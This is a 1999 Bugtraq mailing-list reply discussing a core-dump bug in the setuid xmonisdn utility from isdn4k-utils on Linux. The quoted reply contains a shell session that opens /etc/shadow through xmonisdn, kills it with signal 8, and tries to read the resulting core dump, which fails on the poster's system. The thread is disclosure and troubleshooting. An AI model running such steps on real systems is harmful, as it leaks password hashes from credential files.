[12292] in bugtraq
Re: xmonisdn (isdn4k-utils/Linux) bug report
daemon@ATHENA.MIT.EDU (Ron van Daal)
Wed Oct 20 14:44:23 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9910201425120.32546-100000@server.syntonic.net>
Date: Wed, 20 Oct 1999 14:40:43 +0200
Reply-To: Ron van Daal <ronvdaal@SYNTONIC.NET>
From: Ron van Daal <ronvdaal@SYNTONIC.NET>
X-To: Jan-Hendrik Terstegge <sysadmin@tatooine.ping.de>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <99102013444400.02441@tatooine>
Hi Jan-Hendrik,
That's the behaviour I would expect from xmonisdn. A setuid binary
shouldn't dump core if it's being executed by a user which doesn't
match the ownership of the binary. Therefore I think there are two
problems: 1) (small) bug in xmonisdn 2) a bug in my Linux system.
The problem appeared on my desktop system (RedHat kernel 2.2.5-15),
but I couldn't reproduce it on one of my other Linux systems (using
kernels 2.0.36 and 2.2.12-OpenWall).
--
Ron van Daal | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal@syntonic.net | www.syntonic.net | fax. +31(0)46-4230739
On Wed, 20 Oct 1999, Jan-Hendrik Terstegge wrote:
> On Tue, 19 Oct 1999 Ron wrote:
> > While playing with xmonisdn (included in the isdn4k-utils package),
> > I discovered a little bug. I didn't find anything regarding xmonisdn
> > in the Bugtraq archives, so here's a quick post.
> > I'm wondering if other xmonisdn users can reproduce this exploit.
> > (Tested on my workstation, which is running Red Hat Linux 6.0)
> >[... exploit ...]
> I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it
> seems as if it was an only RedHat Linux exploit.
> This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my
> xmonisdn dies only with an Floating exception but it doesn't dump a core.
>
> ---snip---
> [pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn
> /usr/bin
> -rwsr-xr-x 1 root root 15340 Jul 23 01:20 xmonisdn
> [pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow
>
> [1] + Stopped xmonisdn -file /etc/shadow
> [pts/0@tatooine] /usr/bin > bg
> [1] xmonisdn -file /etc/shadow &
> [pts/0@tatooine] /usr/bin > killall -8 xmonisdn
> [1] Floating exception xmonisdn -file /etc/shadow
> [pts/0@tatooine] /usr/bin > strings core |less
> strings: core: File or Directory not found
> ---snip---
>
>
> --
> Jan-Hendrik Terstegge
> <sysadmin@tatooine.ping.de>
>
